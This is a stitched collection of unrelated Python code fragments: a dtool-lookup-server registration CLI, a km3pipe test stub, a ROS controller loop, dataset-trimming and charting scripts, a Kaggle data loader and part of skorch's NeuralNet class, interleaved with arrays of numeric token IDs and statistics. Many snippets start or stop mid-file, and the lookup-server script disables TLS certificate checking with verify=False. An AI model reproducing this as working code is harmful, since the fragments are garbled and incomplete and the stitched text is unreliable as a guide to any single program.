search_permissions = []
for u in permissions["search"]:
search_permissions.append(u)
data["users_with_search_permissions"] = search_permissions
response = requests.post(
lookup_server_url + "/admin/permission/update_on_base_uri",
headers=get_header(token),
json=data,
verify=False
)
print(data)
print(response.status_code, response.reason)
def register_data(projects_fpath, token, lookup_server_url):
"Register data."
projects = get_projects(projects_fpath)
for b_uri in projects.keys():
for dataset in iter_datasets_in_base_uri(b_uri):
print(dataset.uri)
try:
dataset_info = generate_dataset_info(dataset, b_uri)
except: # NOQA
print("Failed to generate dataset info")
continue
response = requests.post(
lookup_server_url + "/dataset/register",
headers=get_header(token),
json=dataset_info,
verify=False
)
print(response.status_code, response.reason)
@click.group()
def register():
"Register base URIs, users, permissions and data in dtool-lookup-server."
@register.command()
@click.argument("projects_file", type=click.Path(exists=True, dir_okay=False))
@click.argument("token")
@click.argument("lookup_server_url")
def base_uris(projects_file, token, lookup_server_url):
"Register base URIs."
register_base_uris(projects_file, token, lookup_server_url)
@register.command()
@click.argument("projects_file", type=click.Path(exists=True, dir_okay=False))
@click.argument("token")
@click.argument("lookup_server_url")
def users(projects_file, token, lookup_server_url):
"Register users."
register_users(projects_file, token, lookup_server_url)
@register.command()
@click.argument("projects_file", type=click.Path(exists=True, dir_okay=False))
@click.argument("token")
@click.argument("lookup_server_url")
def permissions(projects_file, token, lookup_server_url):
"Register permissions."
register_permissions(projects_file, token, lookup_server_url)
@register.command()
@click.argument("projects_file", type=click.Path(exists=True, dir_okay=False))
@click.argument("token")
@click.argument("lookup_server_url")
def data(projects_file, token, lookup_server_url):
"Register data."
register_data(projects_file, token, lookup_server_url)
@register.command()
@click.argument("projects_file", type=click.Path(exists=True, dir_okay=False))
@click.argument("token")
@click.argument("lookup_server_url")
def all(projects_file, token, lookup_server_url):
"Register base URI, users, permissions and data."
register_base_uris(projects_file, token, lookup_server_url)
register_users(projects_file, token, lookup_server_url)
register_permissions(projects_file, token, lookup_server_url)
register_data(projects_file, token, lookup_server_url)
if __name__ == "__main__":
register()
| [
11748,
3904,
198,
11748,
7007,
198,
11748,
331,
43695,
198,
198,
6738,
288,
25981,
62,
5460,
929,
62,
15388,
13,
26791,
1330,
357,
198,
220,
220,
220,
11629,
62,
19608,
292,
1039,
62,
259,
62,
8692,
62,
9900,
11,
198,
220,
220,
220,... | 2.48913 | 2,024 |
# Filename: test_ch.py
# pylint: disable=locally-disabled,C0111,R0904,C0301,C0103,W0212
from km3pipe.testing import TestCase, patch, Mock
from km3pipe.io.ch import CHPump
__author__ = "Tamas Gal"
__copyright__ = "Copyright 2018, Tamas Gal and the KM3NeT collaboration."
__credits__ = []
__license__ = "MIT"
__maintainer__ = "Tamas Gal"
__email__ = "tgal@km3net.de"
__status__ = "Development"
| [
2,
7066,
12453,
25,
1332,
62,
354,
13,
9078,
198,
2,
279,
2645,
600,
25,
15560,
28,
17946,
453,
12,
47730,
11,
34,
486,
1157,
11,
49,
2931,
3023,
11,
34,
3070,
486,
11,
34,
486,
3070,
11,
54,
2999,
1065,
198,
6738,
10571,
18,
... | 2.609272 | 151 |
#!/usr/bin/env python
# coding: utf-8
import rospy
from traj_generator import TrajectoryGenerator
from controller import Controller
if __name__ == '__main__':
# 1. Create new node
rospy.init_node("main_node")
rate = rospy.Rate(5) # controller freq in Hz
# init our trajectory generator and controller
traj_generator_node = TrajectoryGenerator()
ctrl = Controller()
# run main loop
time_prev = 0
time_start = rospy.get_time()
while not rospy.is_shutdown():
# compute current time and dt
t = rospy.get_time() - time_start
dt = t - time_prev
time_prev = t
if ctrl.exists_odometry(): # if robot exists
pose, vel = traj_generator_node.get_point(t) # get trajectory point for current time
ctrl.update(dt, pose, vel) # send command to robot
print(t, "Robot is moving!")
else:
print("No robot!")
rate.sleep() # wait to obtain loop frequency
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
11748,
686,
2777,
88,
198,
198,
6738,
1291,
73,
62,
8612,
1352,
1330,
4759,
752,
652,
8645,
1352,
198,
6738,
10444,
1330,
22741,
628,
198,
361,
... | 2.21174 | 477 |
from django.test import TestCase
from qatrack.qa import utils
#============================================================================
#----------------------------------------------------------------------
| [
6738,
42625,
14208,
13,
9288,
1330,
6208,
20448,
198,
198,
6738,
10662,
265,
39638,
13,
20402,
1330,
3384,
4487,
198,
198,
2,
23926,
25609,
628,
198,
220,
220,
220,
1303,
10097,
23031,
198
] | 6.666667 | 33 |
import json # import json module
# with statement
with open('./data/spider/train_raw.json') as json_file:
json_data = json.load(json_file)
type(json_data)
re_data = []
for idx, row in enumerate(json_data):
bb = {}
for i in ['db_id', 'query', 'question']:
bb[i] = row[i]
re_data.append(bb)
if idx >= 100:
break
with open('./data/spider/train.json', 'w') as outfile:
json.dump(re_data, outfile, indent=4)
import json # import json module
# with statement
with open('./data/spider/tables_raw.json') as json_file:
json_data = json.load(json_file)
json_data[0].keys()
type(json_data)
re_data = []
for idx, row in enumerate(json_data):
bb = {}
for i in ['column_names', 'column_names_original', 'column_types', 'db_id', 'foreign_keys', 'primary_keys', 'table_names', 'table_names_original']:
bb[i] = row[i]
re_data.append(bb)
if idx >= 100:
break
with open('./data/spider/tables.json', 'w') as outfile:
json.dump(re_data, outfile, indent=4) | [
198,
198,
11748,
33918,
1303,
1330,
33918,
8265,
198,
198,
2,
351,
2643,
198,
4480,
1280,
7,
4458,
14,
7890,
14,
2777,
1304,
14,
27432,
62,
1831,
13,
17752,
11537,
355,
33918,
62,
7753,
25,
198,
220,
220,
220,
33918,
62,
7890,
796,
... | 2.339408 | 439 |
# Example of Dynamic Programming for the fibonacci sequence. Extracted from https://www.youtube.com/watch?v=vYquumk4nWw
# A naive recursive solution
# A memoized solution
# A bottom-up solution | [
2,
17934,
286,
26977,
30297,
329,
262,
12900,
261,
44456,
8379,
13,
5683,
20216,
422,
3740,
1378,
2503,
13,
11604,
13,
785,
14,
8340,
30,
85,
28,
85,
56,
421,
388,
74,
19,
77,
54,
86,
198,
198,
2,
317,
24354,
45115,
4610,
628,
1... | 3.413793 | 58 |
import sys
import xml.etree.ElementTree as ET
LINE_THRESHOLD = 10
TEXT_MATCHES = [".//HedLine_hl1/*/*", ".//Content/*/*"]
TEXT_NODES = ['W','Q']
if __name__ == "__main__":
main(sys.argv) | [
11748,
25064,
198,
11748,
35555,
13,
316,
631,
13,
20180,
27660,
355,
12152,
198,
198,
24027,
62,
4221,
19535,
39,
15173,
796,
838,
198,
32541,
62,
44,
11417,
1546,
796,
685,
1911,
1003,
39,
276,
13949,
62,
18519,
16,
15211,
15211,
16... | 2.180851 | 94 |
from software_defined_assets.spark_weather_assets import spark_weather_assets
from dagster import materialize
from dagster.core.test_utils import instance_for_test
| [
6738,
3788,
62,
23211,
62,
19668,
13,
2777,
668,
62,
23563,
62,
19668,
1330,
9009,
62,
23563,
62,
19668,
198,
198,
6738,
48924,
1706,
1330,
2587,
1096,
198,
6738,
48924,
1706,
13,
7295,
13,
9288,
62,
26791,
1330,
4554,
62,
1640,
62,
... | 3.772727 | 44 |
# Copyright (c) 2011-2016 Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy import *
from lunr.db.uuidimpl import UUID
meta = MetaData()
table_kwargs = {
'mysql_engine': 'InnoDB',
'mysql_charset': 'utf8',
}
account = Table(
'account', meta,
Column('id', String(36), primary_key=True, nullable=False),
Column('status', String(32)),
Column('created_at', DateTime),
Column('last_modified', DateTime),
**table_kwargs
)
backup = Table(
'backup', meta,
Column('id', String(36), primary_key=True, nullable=False),
Column('status', String(32)),
Column('size', Integer, nullable=False),
Column('volume_id', String(36), ForeignKey('volume.id'), nullable=True),
Column('account_id', String(36), ForeignKey('account.id'), nullable=False),
Column('created_at', DateTime),
Column('last_modified', DateTime),
**table_kwargs
)
export = Table(
'export', meta,
Column('id', String(36), primary_key=True, nullable=False),
Column('status', String(32)),
Column('instance_id', String(36)),
Column('mountpoint', String(32)),
Column('ip', String(255)),
Column('initiator', String(255)),
Column('session_ip', String(255)),
Column('session_initiator', String(255)),
Column('created_at', DateTime),
Column('last_modified', DateTime),
Column('target_name', String(255)),
**table_kwargs
)
node = Table(
'node', meta,
Column('id', UUID(), primary_key=True, nullable=False),
Column('name', String(255)),
Column('status', String(32), default='ACTIVE'),
Column('size', Integer, nullable=False),
Column('volume_type_name', String(255), ForeignKey('volume_type.name'),
nullable=False),
Column('meta', String(1024)),
Column('hostname', String(256), nullable=False),
Column('port', Integer, nullable=False, default=8081),
Column('storage_hostname', String(256), nullable=False),
Column('storage_port', Integer, nullable=False, default=3260),
Column('created_at', DateTime),
Column('last_modified', DateTime),
**table_kwargs
)
volume = Table(
'volume', meta,
Column('id', String(36), primary_key=True, nullable=False),
Column('status', String(32)),
Column('size', Integer, nullable=False),
Column('volume_type_name', String(255), ForeignKey('volume_type.name'),
nullable=False),
Column('node_id', UUID(), ForeignKey('node.id')),
Column('account_id', String(36), ForeignKey('account.id'), nullable=False),
Column('clone_of', String(36), nullable=True),
Column('created_at', DateTime),
Column('last_modified', DateTime),
**table_kwargs
)
volume_type = Table(
'volume_type', meta,
Column('name', String(255), primary_key=True, nullable=False),
Column('status', String(32)),
Column('min_size', Integer, nullable=False),
Column('max_size', Integer, nullable=False),
Column('read_iops', Integer, nullable=False),
Column('write_iops', Integer, nullable=False),
Column('created_at', DateTime),
Column('last_modified', DateTime),
**table_kwargs
)
| [
2,
15069,
357,
66,
8,
2813,
12,
5304,
37927,
13200,
1294,
11,
3457,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
... | 2.841693 | 1,276 |
import pandas as pd
from pandas import DataFrame
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
df = pd.read_csv('Lite_Coin_12_Mos.csv')
print(df.head())
print(df.tail())
print(df.index)
print(df.columns)
print("-----")
print(df.describe())
#print mediuan
print('median')
print(df.median())
print("-----")
#Mode
print('mode')
print(df.mode())
print("-----")
#Variance
##In probability theory and statistics, variance is the expectation of the squared deviation of a random variable from its mean.
##Informally, it measures how far a set of numbers are spread out from their average value.
print('variance')
print(df.var())
print("-----")
#Co-Variance
print('co-variance')
print(df.cov())
#Cumsum
#print('Cumsum')
#print(df.cumsum())
#Scalar Map
#print('Map')
#print(df.applymap())
#Multiply
#print('Multiply')
#print(df.mul())
#Modulo
#print('Modulo')
#print(df.mod())
| [
11748,
19798,
292,
355,
279,
67,
198,
6738,
19798,
292,
1330,
6060,
19778,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
6738,
285,
489,
62,
25981,
74,
896,
13,
76,
29487,
18,
67,
1330,
12176,
274,
18,
35,
198,
... | 2.700297 | 337 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Name: CodyCloud Ngrok Server
# Author: Icy(enderman1024@foxmail.com)
# OS: Linux
import time, socket, threading, os, sys, json
if __name__ == "__main__":
main()
| [
2,
48443,
14629,
14,
8800,
14,
29412,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
6530,
25,
27035,
18839,
399,
27333,
74,
9652,
198,
2,
6434,
25,
314,
948,
7,
2194,
805,
35500,
31,
12792,
4529,
13,... | 2.363636 | 110 |
# Test osqp python module
import osqp
from osqp import constant, default_algebra
# import osqppurepy as osqp
import numpy as np
from scipy import sparse
# Unit Test
import unittest
import pytest
import numpy.testing as nptest
| [
2,
6208,
28686,
80,
79,
21015,
8265,
198,
11748,
28686,
80,
79,
198,
6738,
28686,
80,
79,
1330,
6937,
11,
4277,
62,
282,
29230,
198,
2,
1330,
28686,
80,
381,
495,
9078,
355,
28686,
80,
79,
198,
11748,
299,
32152,
355,
45941,
198,
... | 3.081081 | 74 |
from __future__ import annotations
import base64
import base58 # type: ignore
from neo3 import vm, contracts
from neo3.contracts.interop import register
@register("System.Binary.Serialize", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Deserialize", 1 << 14, contracts.CallFlags.NONE)
@register("System.Binary.Base64Encode", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Base64Decode", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Base58Encode", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Base58Decode", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Itoa", 1 << 12, contracts.CallFlags.NONE)
@register("System.Binary.Atoi", 1 << 12, contracts.CallFlags.NONE)
| [
6738,
11593,
37443,
834,
1330,
37647,
198,
11748,
2779,
2414,
198,
11748,
2779,
3365,
220,
1303,
2099,
25,
8856,
198,
6738,
19102,
18,
1330,
45887,
11,
8592,
198,
6738,
19102,
18,
13,
28484,
82,
13,
3849,
404,
1330,
7881,
628,
198,
31... | 3 | 250 |
from json import loads
from os.path import isfile, splitext
from sys import argv, exit
from highcharts import Highchart
# Keys expected in the query-result JSON structure
# (presumably a Solr-style response -- verify against the producer).
DOCS = 'docs'
RESPONSE = 'response'
LANG = 'tweet_lang'
COUNTRY = 'user_location'
# Highcharts option dictionary keys.
TITLE = 'title'
TEXT = 'text'

# Make sure we have the correct command line arguments
# (print statements: this script targets Python 2).
if len(argv) != 4:
    print "Please provide command line arguments as follows:"
    print "python pie.py <JSON Query Results> <By Language Output File> <By Country Output File>"
    exit(0)

# argv[1] may be either a path to a JSON file or a raw JSON string.
if isfile(argv[1]):
    with open(argv[1], 'r') as jsonFile:
        jsonInput = loads(jsonFile.read())
else:
    jsonInput = loads(argv[1])

# Validate the expected 'response' -> 'docs' nesting before use.
if RESPONSE in jsonInput:
    if DOCS in jsonInput[RESPONSE]:
        docs = jsonInput[RESPONSE][DOCS]
    else:
        print "'docs' list not found in JSON 'response'!"
        exit(0)
else:
    print "'response' dictionary not found in JSON!"
    exit(0)

# Tally result counts per (upper-cased) language and per country;
# falsy values (empty string/None) are skipped.
langs = {}
countries = {}
for doc in docs:
    if LANG in doc:
        lang = doc[LANG]
        if lang:
            lang = lang.upper()
            if lang in langs:
                langs[lang] += 1
            else:
                langs[lang] = 1
    if COUNTRY in doc:
        country = doc[COUNTRY]
        if country:
            if country in countries:
                countries[country] += 1
            else:
                countries[country] = 1

# Pie chart of results per language; the output name comes from
# argv[2] with its extension stripped (Highchart adds its own).
chart = Highchart()
options = {TITLE : {TEXT : 'Results per Language'}}
chart.set_dict_options(options)
chart.add_data_set(langs.items(), series_type='pie', name='Results')
chart.save_file(splitext(argv[2])[0])

# Pie chart of results per country (output name from argv[3]).
chart = Highchart()
options = {TITLE : {TEXT : 'Results per Country'}}
chart.set_dict_options(options)
chart.add_data_set(countries.items(), series_type='pie', name='Results')
chart.save_file(splitext(argv[3])[0])
| [
6738,
33918,
1330,
15989,
198,
6738,
28686,
13,
6978,
1330,
318,
7753,
11,
4328,
578,
742,
198,
6738,
25064,
1330,
1822,
85,
11,
8420,
198,
198,
6738,
1029,
354,
5889,
1330,
3334,
40926,
628,
198,
38715,
50,
220,
220,
220,
220,
796,
... | 2.572308 | 650 |
from PyQt5 import QtCore, QtWidgets
import sys
from multiprocessing import Process, Queue
from time import time
import vtk
from vtk.qt.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor
import numpy as np
from time import sleep
# Some other functions I toyed with before I got the vtk example working
# Entry-point guard: build the Qt application and show the demo window.
# NOTE(review): ``DemoGui`` is defined elsewhere in the full module --
# this excerpt does not show it; confirm before running.
if __name__ == '__main__':
    app = QtWidgets.QApplication([])
    window = DemoGui()
    window.show()
    app.exec_()
| [
198,
198,
6738,
9485,
48,
83,
20,
1330,
33734,
14055,
11,
33734,
54,
312,
11407,
198,
11748,
25064,
198,
6738,
18540,
305,
919,
278,
1330,
10854,
11,
4670,
518,
198,
6738,
640,
1330,
640,
198,
11748,
410,
30488,
198,
6738,
410,
30488,... | 3.020408 | 147 |
import os
import pandas as pd
from tqdm import tqdm
# Resolve the dataset root: Ian's local checkout when running on his
# machine (USER == "ian"), otherwise the read-only Kaggle input mount.
_IS_LOCAL = os.environ.get("USER") == "ian"
ROOT = (
    "/home/ian/data/kaggle/optiver_volatility/"
    if _IS_LOCAL
    else "/kaggle/input/optiver-realized-volatility-prediction"
)
print(f"Utility says ROOT is {ROOT}")

# Canonical locations of the label CSVs inside the dataset root.
TRAIN_CSV = os.path.join(ROOT, "train.csv")
TEST_CSV = os.path.join(ROOT, "test.csv")
def get_data(verbose=True, stock_ids=None):
    """Load the Optiver training labels and the full order-book data.

    Parameters
    ----------
    verbose : bool (default=True)
        If True, print diagnostics about what was loaded.
    stock_ids : None, 'all' or iterable of int (default=None)
        Stocks to keep in the returned training frame. ``None`` or
        ``'all'`` keeps every stock (previously the ``None`` default
        crashed with ``TypeError`` on ``len(None)`` and in the
        ``query`` filter). The book data is always loaded in full
        regardless of this filter.

    Returns
    -------
    (df_train_all, df_book_train) : tuple of pandas.DataFrame
        The (possibly filtered) training targets and the raw
        order-book training data.
    """
    items_in_folder = os.listdir(os.path.join(ROOT, "book_train.parquet"))
    if verbose:
        # Bug fix: the second line used to be a plain (non-f) string,
        # so the sample items were printed literally; both parts are
        # f-strings now and a separating space was added.
        print(
            f"There are {len(items_in_folder)} items in the folder "
            f"and they look like {items_in_folder[:5]}"
        )

    keep_all = stock_ids is None or (
        isinstance(stock_ids, str) and stock_ids == "all"
    )
    if not keep_all:
        # Materialize once so ranges/generators survive reuse below.
        stock_ids = list(stock_ids)

    # Reading the partitioned folder in one call lets pandas/pyarrow
    # reconstruct the stock_id partition column for us (the previous
    # per-stock and dask code paths were dead ``if False:`` branches).
    df_book_train = pd.read_parquet(os.path.join(ROOT, "book_train.parquet"))
    if verbose:
        described = "all" if keep_all else len(stock_ids)
        print(
            f"Loaded {df_book_train.shape[0]:,} rows for book_train "
            f"on {described} stock_ids"
        )

    df_train_all = pd.read_csv(TRAIN_CSV)
    if keep_all:
        print("Kept all training rows during get_data")
        return df_train_all, df_book_train

    training_rows_was = df_train_all.shape[0]
    # ``@stock_ids`` references the local list inside the query string.
    df_train_all = df_train_all.query("stock_id in @stock_ids")
    training_rows_is = df_train_all.shape[0]
    if training_rows_was != training_rows_is:
        print(f"**** Had {training_rows_was:,} rows, now we have {training_rows_is:,}")
    else:
        print("Kept all training rows during get_data")
    return df_train_all, df_book_train
| [
11748,
28686,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
198,
361,
28686,
13,
268,
2268,
13,
1136,
7203,
29904,
4943,
6624,
366,
666,
1298,
198,
220,
220,
220,
15107,
2394,
796,
12813,
... | 2.072863 | 1,743 |
# Read an integer from the user (input must be numeric text).
n = int(input('digite um número:')) 
# Double, triple and square root of the number.
d = n * 2
t = n * 3
r = n ** (1/2)
# Report the three derived values; the root is shown with 0 decimals.
print ('o dobro de {} é {} o triplo {} e a raiz quadrada é {:.0f}'.format(n,d,t,r))
| [
77,
796,
493,
7,
15414,
10786,
12894,
578,
23781,
299,
21356,
647,
78,
32105,
4008,
220,
198,
67,
796,
299,
1635,
362,
198,
83,
796,
299,
1635,
513,
198,
81,
796,
299,
12429,
357,
16,
14,
17,
8,
198,
4798,
19203,
78,
466,
7957,
... | 2 | 78 |
'''
Created by auto_sdk on 2015.11.25
'''
from aliyun.api.base import RestApi
| [
7061,
6,
201,
198,
41972,
416,
8295,
62,
21282,
74,
319,
1853,
13,
1157,
13,
1495,
201,
198,
7061,
6,
201,
198,
6738,
435,
7745,
403,
13,
15042,
13,
8692,
1330,
8324,
32,
14415,
201,
198
] | 2.277778 | 36 |
import numpy as np
| [
198,
11748,
299,
32152,
355,
45941,
198
] | 2.857143 | 7 |
"""Neural net classes."""
import fnmatch
from itertools import chain
from functools import partial
import re
import tempfile
import warnings
import numpy as np
from sklearn.base import BaseEstimator
import torch
from torch.utils.data import DataLoader
from skorch.callbacks import EpochTimer
from skorch.callbacks import PrintLog
from skorch.callbacks import EpochScoring
from skorch.callbacks import BatchScoring
from skorch.dataset import Dataset
from skorch.dataset import CVSplit
from skorch.dataset import get_len
from skorch.exceptions import DeviceWarning
from skorch.exceptions import NotInitializedError
from skorch.history import History
from skorch.utils import duplicate_items
from skorch.utils import get_dim
from skorch.utils import is_dataset
from skorch.utils import to_numpy
from skorch.utils import to_tensor
from skorch.utils import params_for
# pylint: disable=unused-argument
# pylint: disable=unused-argument
# pylint: disable=too-many-instance-attributes
class NeuralNet(object):
# pylint: disable=anomalous-backslash-in-string
"""NeuralNet base class.
The base class covers more generic cases. Depending on your use
case, you might want to use ``NeuralNetClassifier`` or
``NeuralNetRegressor``.
In addition to the parameters listed below, there are parameters
with specific prefixes that are handled separately. To illustrate
this, here is an example:
>>> net = NeuralNet(
... ...,
... optimizer=torch.optimizer.SGD,
... optimizer__momentum=0.95,
...)
This way, when ``optimizer`` is initialized, ``NeuralNet`` will
take care of setting the ``momentum`` parameter to 0.95.
(Note that the double underscore notation in
``optimizer__momentum`` means that the parameter ``momentum``
should be set on the object ``optimizer``. This is the same
semantic as used by sklearn.)
Furthermore, this allows to change those parameters later:
``net.set_params(optimizer__momentum=0.99)``
This can be useful when you want to change certain parameters
using a callback, when using the net in an sklearn grid search,
etc.
By default an ``EpochTimer``, ``AverageLoss``, ``BestLoss``, and
``PrintLog`` callback is installed for the user's convenience.
Parameters
----------
module : torch module (class or instance)
A torch module. In general, the uninstantiated class should be
passed, although instantiated modules will also work.
criterion : torch criterion (class)
The uninitialized criterion (loss) used to optimize the
module.
optimizer : torch optim (class, default=torch.optim.SGD)
The uninitialized optimizer (update rule) used to optimize the
module
lr : float (default=0.01)
Learning rate passed to the optimizer. You may use ``lr`` instead
of using ``optimizer__lr``, which would result in the same outcome.
max_epochs : int (default=10)
The number of epochs to train for each ``fit`` call. Note that you
may keyboard-interrupt training at any time.
batch_size : int (default=128)
Mini-batch size. Use this instead of setting
``iterator_train__batch_size`` and ``iterator_test__batch_size``,
which would result in the same outcome.
iterator_train : torch DataLoader
The default ``torch.utils.data.DataLoader`` used for training
data.
iterator_valid : torch DataLoader
The default ``torch.utils.data.DataLoader`` used for validation
and test data, i.e. during inference.
dataset : torch Dataset (default=skorch.dataset.Dataset)
The dataset is necessary for the incoming data to work with
pytorch's ``DataLoader``. It has to implement the ``__len__`` and
``__getitem__`` methods. The provided dataset should be capable of
dealing with a lot of data types out of the box, so only change
this if your data is not supported. Additionally, dataset should
accept a ``device`` parameter to indicate the location of the
data (e.g., CUDA).
You should generally pass the uninitialized ``Dataset`` class
and define additional arguments to X and y by prefixing them
with ``dataset__``. It is also possible to pass an initialzed
``Dataset``, in which case no additional arguments may be
passed.
train_split : None or callable (default=skorch.dataset.CVSplit(5))
If None, there is no train/validation split. Else, train_split
should be a function or callable that is called with X and y
data and should return the tuple ``X_train, X_valid, y_train,
y_valid``. The validation data may be None.
callbacks : None or list of Callback instances (default=None)
More callbacks, in addition to those returned by
``get_default_callbacks``. Each callback should inherit from
skorch.Callback. If not None, a list of tuples (name, callback)
should be passed, where names should be unique. Callbacks may or
may not be instantiated.
Alternatively, it is possible to just pass a list of callbacks,
which results in names being inferred from the class name.
The callback name can be used to set parameters on specific
callbacks (e.g., for the callback with name ``'print_log'``, use
``net.set_params(callbacks__print_log__keys=['epoch',
'train_loss'])``).
warm_start : bool (default=False)
Whether each fit call should lead to a re-initialization of the
module (cold start) or whether the module should be trained
further (warm start).
verbose : int (default=1)
Control the verbosity level.
device : str, torch.device (default='cpu')
The compute device to be used. If set to 'cuda', data in torch
tensors will be pushed to cuda tensors before being sent to the
module.
Attributes
----------
prefixes\_ : list of str
Contains the prefixes to special parameters. E.g., since there
is the ``'module'`` prefix, it is possible to set parameters like
so: ``NeuralNet(..., optimizer__momentum=0.95)``.
cuda_dependent_attributes\_ : list of str
Contains a list of all attributes whose values depend on a CUDA
device. If a ``NeuralNet`` trained with a CUDA-enabled device is
unpickled on a machine without CUDA or with CUDA disabled, the
listed attributes are mapped to CPU. Expand this list if you
want to add other cuda-dependent attributes.
initialized\_ : bool
Whether the NeuralNet was initialized.
module\_ : torch module (instance)
The instantiated module.
criterion\_ : torch criterion (instance)
The instantiated criterion.
callbacks\_ : list of tuples
The complete (i.e. default and other), initialized callbacks, in
a tuple with unique names.
"""
prefixes_ = ['module', 'iterator_train', 'iterator_valid', 'optimizer',
'criterion', 'callbacks', 'dataset']
cuda_dependent_attributes_ = ['module_', 'optimizer_']
# pylint: disable=too-many-arguments
@property
def notify(self, method_name, **cb_kwargs):
"""Call the callback method specified in ``method_name`` with
parameters specified in ``cb_kwargs``.
Method names can be one of:
* on_train_begin
* on_train_end
* on_epoch_begin
* on_epoch_end
* on_batch_begin
* on_batch_end
"""
getattr(self, method_name)(self, **cb_kwargs)
for _, cb in self.callbacks_:
getattr(cb, method_name)(self, **cb_kwargs)
# pylint: disable=unused-argument
# pylint: disable=unused-argument
# pylint: disable=unused-argument
# pylint: disable=unused-argument
# pylint: disable=unused-argument
def _yield_callbacks(self):
"""Yield all callbacks set on this instance.
Handles these cases:
* default and user callbacks
* callbacks with and without name
* initialized and uninitialized callbacks
* puts PrintLog(s) last
"""
print_logs = []
for item in self.get_default_callbacks() + (self.callbacks or []):
if isinstance(item, (tuple, list)):
name, cb = item
else:
cb = item
if isinstance(cb, type): # uninitialized:
name = cb.__name__
else:
name = cb.__class__.__name__
if isinstance(cb, PrintLog) or (cb == PrintLog):
print_logs.append((name, cb))
else:
yield name, cb
yield from print_logs
    def initialize_callbacks(self):
        """Initializes all callbacks and save the result in the
        ``callbacks_`` attribute.
        Both ``default_callbacks`` and ``callbacks`` are used (in that
        order). Callbacks may either be initialized or not, and if
        they don't have a name, the name is inferred from the class
        name. The ``initialize`` method is called on all callbacks.
        The final result will be a list of tuples, where each tuple
        consists of a name and an initialized callback. If names are
        not unique, a ValueError is raised.
        """
        names_seen = set()
        callbacks_ = []
        for name, cb in self._yield_callbacks():
            # Duplicate names would make ``callbacks__<name>__*``
            # parameter routing ambiguous, hence the hard error.
            if name in names_seen:
                raise ValueError("The callback name '{}' appears more than "
                                 "once.".format(name))
            names_seen.add(name)
            # check if callback itself is changed
            # NOTE(review): ``Dummy`` acts as a "not set" sentinel for
            # getattr; it must be defined/imported elsewhere in the
            # full module -- confirm.
            param_callback = getattr(self, 'callbacks__' + name, Dummy)
            if param_callback is not Dummy: # callback itself was set
                cb = param_callback
            # below: check for callback params
            # don't set a parameter for non-existing callback
            params = self._get_params_for('callbacks__{}'.format(name))
            if (cb is None) and params:
                raise ValueError("Trying to set a parameter for callback {} "
                                 "which does not exist.".format(name))
            if cb is None:
                # Callback was deactivated (set to None) -- skip it.
                continue
            if isinstance(cb, type): # uninitialized:
                cb = cb(**params)
            else:
                cb.set_params(**params)
            cb.initialize()
            callbacks_.append((name, cb))
        self.callbacks_ = callbacks_
        return self
def initialize_criterion(self):
"""Initializes the criterion."""
criterion_params = self._get_params_for('criterion')
self.criterion_ = self.criterion(**criterion_params)
return self
    def initialize_module(self):
        """Initializes the module.
        Note that if the module has learned parameters, those will be
        reset.
        """
        kwargs = self._get_params_for('module')
        module = self.module
        is_initialized = isinstance(module, torch.nn.Module)
        # Re-instantiate when module__* params were supplied or the
        # user passed an uninstantiated class; otherwise keep the
        # already-built instance as-is.
        if kwargs or not is_initialized:
            if is_initialized:
                # Recover the class so it can be rebuilt with kwargs.
                module = type(module)
            if is_initialized or self.initialized_:
                if self.verbose:
                    print("Re-initializing module!")
            module = module(**kwargs)
        # Always move the module to the configured compute device.
        self.module_ = module.to(self.device)
        return self
def initialize_optimizer(self):
"""Initialize the model optimizer. If ``self.optimizer__lr``
is not set, use ``self.lr`` instead.
"""
args, kwargs = self._get_params_for_optimizer(
'optimizer', self.module_.named_parameters())
if 'lr' not in kwargs:
kwargs['lr'] = self.lr
self.optimizer_ = self.optimizer(*args, **kwargs)
def initialize_history(self):
"""Initializes the history."""
self.history = History()
def initialize(self):
"""Initializes all components of the NeuralNet and returns
self.
"""
self.initialize_callbacks()
self.initialize_criterion()
self.initialize_module()
self.initialize_optimizer()
self.initialize_history()
self.initialized_ = True
return self
def validation_step(self, Xi, yi, **fit_params):
"""Perform a forward step using batched data and return the
resulting loss.
The module is set to be in evaluation mode (e.g. dropout is
not applied).
Parameters
----------
Xi : input data
A batch of the input data.
yi : target data
A batch of the target data.
**fit_params : dict
Additional parameters passed to the ``forward`` method of
the module and to the train_split call.
"""
self.module_.eval()
y_pred = self.infer(Xi, **fit_params)
loss = self.get_loss(y_pred, yi, X=Xi, training=False)
return {
'loss': loss,
'y_pred': y_pred,
}
def train_step(self, Xi, yi, **fit_params):
"""Perform a forward step using batched data, update module
parameters, and return the loss.
The module is set to be in train mode (e.g. dropout is
applied).
Parameters
----------
Xi : input data
A batch of the input data.
yi : target data
A batch of the target data.
**fit_params : dict
Additional parameters passed to the ``forward`` method of
the module and to the train_split call.
"""
self.module_.train()
self.optimizer_.zero_grad()
y_pred = self.infer(Xi, **fit_params)
loss = self.get_loss(y_pred, yi, X=Xi, training=True)
loss.backward()
self.notify(
'on_grad_computed',
named_parameters=list(self.module_.named_parameters())
)
self.optimizer_.step()
return {
'loss': loss,
'y_pred': y_pred,
}
def evaluation_step(self, Xi, training=False):
"""Perform a forward step to produce the output used for
prediction and scoring.
